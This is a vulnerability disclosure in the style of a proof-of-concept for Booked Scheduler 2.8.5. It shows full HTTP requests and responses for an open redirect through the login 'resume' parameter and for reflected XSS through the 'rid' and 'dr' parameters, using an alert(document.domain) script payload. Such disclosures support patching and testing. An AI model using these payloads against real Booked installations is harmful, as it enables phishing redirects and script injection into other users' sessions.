# Exploit Title: Open Redirect / Reflected XSS - booked-schedulerv2.8.5
# Date: 10/2024
# Exploit Author: Andrey Stoykov
# Version: 2.8.5
# Tested on: Ubuntu 22.04
# Blog:
https://msecureltd.blogspot.com/2024/10/friday-fun-pentest-series-13-reflected.html
https://msecureltd.blogspot.com/2024/10/friday-fun-pentest-series-12-open.htmlOpen Redirect:
Steps to Reproduce:
1. Login and intercept HTTP request with a proxy such as Burpsuite or ZAP
2. In the "resume" parameter add the redirect URL e.g. Burp Collab
3. Forward the request
index.php
// HTTP POST login request
POST /Bookedbo8effotfu/Web/index.php HTTP/1.1
Host: localhost
Cookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb;
fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yes
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)
Gecko/20100101 Firefox/132.0
[...]
email=admin&password=password&captcha=&login=submit&resume=
https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com&language=en_gbg
// HTTP response
HTTP/1.1 302 Found
Date: Sat, 12 Oct 2024 12:09:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
Reflected XSS:
reservation.php
// HTTP GET request
GET
/Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script>
HTTP/1.1
Host: localhost
Cookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb;
new_version=v%3D2.8.5%2Cfs%3D1728734988;
fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yes
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)
Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Dnt: 1
Sec-Gpc: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive
// HTTP response
HTTP/1.1 200 OK
Date: Sat, 12 Oct 2024 12:23:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14003
<h5><a
href="//localhost/Bookedbo8effotfu/Web/reservation.php?rid="><script>alert(document.domain)</script>">Return
to the last page that you were on</a></h5>
</div>
schedule.php
// HTTP GET request
GET
/Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script>
HTTP/1.1
Host: localhost
Cookie: PHPSESSID=c7aa15661bb6b0b72ab88132664b75c9; language=en_gb;
resource_filter1=%7B%22ScheduleId%22%3A%221%22%2C%22ResourceIds%22%3A%5B%5D%2C%22ResourceTypeId%22%3Anull%2C%22MinCapacity%22%3Anull%2C%22ResourceAttributes%22%3A%5B%5D%2C%22ResourceTypeAttributes%22%3A%5B%5D%7D;
schedule_calendar_toggle=false
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0)
Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive
// HTTP response
HTTP/1.1 200 OK
Date: Sat, 19 Oct 2024 09:12:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7853
<h5><a
href="//localhost/Bookedldk0euwfjx/Web/schedule.php?dr="><script>alert(document.domain)</script>">Return
to the last page that you were on